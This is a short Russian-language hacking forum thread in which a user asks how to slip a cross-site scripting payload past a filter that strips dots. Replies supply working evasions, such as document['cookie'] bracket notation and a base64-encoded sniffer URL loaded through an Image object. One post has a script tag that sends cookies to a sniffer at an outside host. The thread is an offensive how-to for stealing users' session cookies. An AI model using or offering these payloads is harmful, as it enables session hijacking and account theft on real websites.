Фильтрация точки в запросе

Discussion in 'Песочница' started by Ditss, 5 Nov 2015.

  1. Ditss

    Ditss New Member

    Joined:
    5 Nov 2015
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте все! Можно как-то обойти фильтрацию точки в запросе?
    Есть запрос
    Code:
    /index.php?p="><script>alert(document.cookie)</script>
    Но точка в document.cookie фильтруется... ( Пробовал вставлять ASCII коды точки, но фильтр и на них...
    Заранее спасибо!
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    912
    Reputations:
    363
    document["cookie"]
     
    _________________________
  3. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,307
    Reputations:
    1,557
    Можете привести пример уязвимого кода, где сработает такая атака?
     
  4. altai

    altai Member

    Joined:
    22 Oct 2015
    Messages:
    52
    Likes Received:
    13
    Reputations:
    0
    я не внимательно прочитал вопрос :) Согласен, фигню сказал :)
     
  5. Ditss

    Ditss New Member

    Joined:
    5 Nov 2015
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Спасибо, так работает! А если нужно сделать так:
    Code:
    "><script src=http://www.host.org/sniff.php?c=+document["cookie"]></script>
    как подменять точки в строке адреса?
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    912
    Reputations:
    363
    (new Image())["src"]=atob("lol")+document["cookie"]
    где lol - ссылка на сниффер в base64
     
    _________________________
  7. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,307
    Reputations:
    1,557
    Этот код не будет работать даже без фильтрации точек.
     
Loading...